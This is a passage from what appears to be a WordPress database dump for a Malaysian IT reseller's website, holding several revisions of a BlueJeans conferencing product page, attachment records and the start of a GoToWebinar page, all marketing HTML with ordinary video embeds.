class=\"Column-body\">\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>','BlueJeans','','publish','closed','closed','','bluejeans','','','2019-01-04 16:27:42','2019-01-04 08:27:42','',0,'https://bintara.com.my/?page_id=2024',0,'page','',0),(2028,1,'2018-12-13 18:58:38','2018-12-13 10:58:38','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 18:58:38','2018-12-13 10:58:38','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2025,1,'2018-12-13 18:51:17','2018-12-13 10:51:17','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meetings platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n<a href=\"https://www.bluejeans.com/about?wvideo=45c7tmnxvx\"><img class=\"alignnone\" style=\"width: 622px; height: 350px;\" src=\"https://embedwistia-a.akamaihd.net/deliveries/515c509483a9aa2a2094e9420d992c22a1e142d7.jpg?image_play_button_size=2x&amp;image_crop_resized=960x540&amp;image_play_button=1&amp;image_play_button_color=7b796ae0\" width=\"400\" height=\"225\" /></a>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 18:51:17','2018-12-13 10:51:17','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2026,1,'2018-12-13 18:51:57','2018-12-13 10:51:57','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n<a href=\"https://www.bluejeans.com/about?wvideo=45c7tmnxvx\"><img class=\"alignnone\" style=\"width: 714px; height: 402px;\" src=\"https://embedwistia-a.akamaihd.net/deliveries/515c509483a9aa2a2094e9420d992c22a1e142d7.jpg?image_play_button_size=2x&amp;image_crop_resized=960x540&amp;image_play_button=1&amp;image_play_button_color=7b796ae0\" width=\"400\" height=\"225\" /></a>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 18:51:57','2018-12-13 10:51:57','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2027,1,'2018-12-13 18:56:14','2018-12-13 10:56:14','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n<a href=\"https://www.bluejeans.com/about?wvideo=45c7tmnxvx\"><img style=\"width: 400px; height: 225px;\" src=\"https://embedwistia-a.akamaihd.net/deliveries/515c509483a9aa2a2094e9420d992c22a1e142d7.jpg?image_play_button_size=2x&amp;image_crop_resized=960x540&amp;image_play_button=1&amp;image_play_button_color=7b796ae0\" width=\"400\" height=\"225\" /></a>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 18:56:14','2018-12-13 10:56:14','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2029,1,'2018-12-13 19:07:11','2018-12-13 11:07:11','','bluejean','','inherit','closed','closed','','bluejean','','','2018-12-13 19:07:11','2018-12-13 11:07:11','',2024,'https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png',0,'attachment','image/png',0),(2031,1,'2018-12-13 19:08:49','2018-12-13 11:08:49','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"alignnone size-full wp-image-2029\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"1024\" height=\"418\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:08:49','2018-12-13 11:08:49','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2030,1,'2018-12-13 19:07:33','2018-12-13 11:07:33','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"alignnone size-full wp-image-2029\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"1024\" height=\"418\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:07:33','2018-12-13 11:07:33','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2032,1,'2018-12-13 19:09:28','2018-12-13 11:09:28','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"alignnone size-full wp-image-2029\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"1024\" height=\"418\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','BlueJea','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:09:28','2018-12-13 11:09:28','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2033,1,'2018-12-13 19:09:57','2018-12-13 11:09:57','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"alignnone size-full wp-image-2029\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"1024\" height=\"418\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJea','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:09:57','2018-12-13 11:09:57','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2035,1,'2018-12-13 19:11:35','2018-12-13 11:11:35','<a href=\"https://bintara.com.my/bluejeans/\">Read More...</a>','BLUEJEANS','','private','closed','closed','','bluejeans','','','2019-09-23 10:12:31','2019-09-23 02:12:31','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=2035',0,'portfolio','',0),(2034,1,'2018-12-13 19:10:09','2018-12-13 11:10:09','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"alignnone size-full wp-image-2029\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"1024\" height=\"418\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJea','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:10:09','2018-12-13 11:10:09','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2814,1,'2019-01-04 16:27:42','2019-01-04 08:27:42','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h3 class=\"Section-title h2\">Modernize your meetings for today\'s work</h3>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"wp-image-2029 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"637\" height=\"260\" />\r\n\r\n</header>\r\n<h2 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h2>\r\nCloud-based meeting and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li><strong>Simple</strong></li>\r\n</ul>\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-body\"><strong>Modern</strong></li>\r\n</ul>\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-body\"><strong>Trusted</strong></li>\r\n</ul>\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n<div class=\"Column-body\">\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2019-01-04 16:27:42','2019-01-04 08:27:42','',2024,'https://bintara.com.my/blog/2019/01/04/2024-revision-v1/',0,'revision','',0),(2039,1,'2018-12-13 19:15:53','2018-12-13 11:15:53','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"wp-image-2029 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"637\" height=\"260\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:15:53','2018-12-13 11:15:53','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2036,1,'2018-12-13 19:12:13','2018-12-13 11:12:13','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"alignnone size-full wp-image-2029\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"1024\" height=\"418\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meetings and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:12:13','2018-12-13 11:12:13','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2037,1,'2018-12-13 19:14:16','2018-12-13 11:14:16','Read More...','BLUEJEANS','','inherit','closed','closed','','2035-autosave-v1','','','2018-12-13 19:14:16','2018-12-13 11:14:16','',2035,'https://bintara.com.my/blog/2018/12/13/2035-autosave-v1/',0,'revision','',0),(2414,1,'2018-12-18 19:57:49','2018-12-18 11:57:49','','bitdefender-gravityzone-elite - Copy','','inherit','closed','closed','','bitdefender-gravityzone-elite-copy','','','2018-12-18 19:57:49','2018-12-18 11:57:49','',1448,'https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-elite-Copy.png',0,'attachment','image/png',0),(2415,1,'2018-12-18 19:57:51','2018-12-18 11:57:51','','bitdefender-gravityzone-enterprise - Copy','','inherit','closed','closed','','bitdefender-gravityzone-enterprise-copy','','','2018-12-18 19:57:51','2018-12-18 11:57:51','',1448,'https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-enterprise-Copy.png',0,'attachment','image/png',0),(2040,1,'2018-12-13 19:16:28','2018-12-13 11:16:28','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h2 class=\"Section-title h2\">Modernize your meetings for today\'s work</h2>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"wp-image-2029 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"637\" height=\"260\" />\r\n\r\n</header>\r\n<h1 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h1>\r\nCloud-based meeting and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-13 19:16:28','2018-12-13 11:16:28','',2024,'https://bintara.com.my/blog/2018/12/13/2024-revision-v1/',0,'revision','',0),(2043,1,'2018-12-13 19:23:14','2018-12-13 11:23:14','<h3 class=\"section-header__subheadline\">Our easy-to-use technology allows you to actually have fun presenting. And our fully interactive features ensure you keep attendees glued to their screen.</h3>\r\nGoToWebinar erases the headache and hassle from webinars. No matter your goal or skill level, youâ€™ll quickly see why so many love GoToWebinar. Go from preparing a webinar to presenting in fewer steps â€“ and have a lot of fun along the way.\r\n\r\n<img class=\" wp-image-1977 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gotowebinar.png\" alt=\"\" width=\"434\" height=\"298\" />\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Engagement Dashboard</strong> -- Keep an eye on attentiveness, hands raised and time elapsed.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Presenter Webcams</strong> -- Show off your bright smile and invite panelists to do the same.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Polls &amp; Surveys</strong> -- Engage your audience with slide-in questions and live results.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/uDdg_Z2KzHs\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n&nbsp;\r\n\r\n</div>','GoToWebinar','','inherit','closed','closed','','1633-revision-v1','','','2018-12-13 19:23:14','2018-12-13 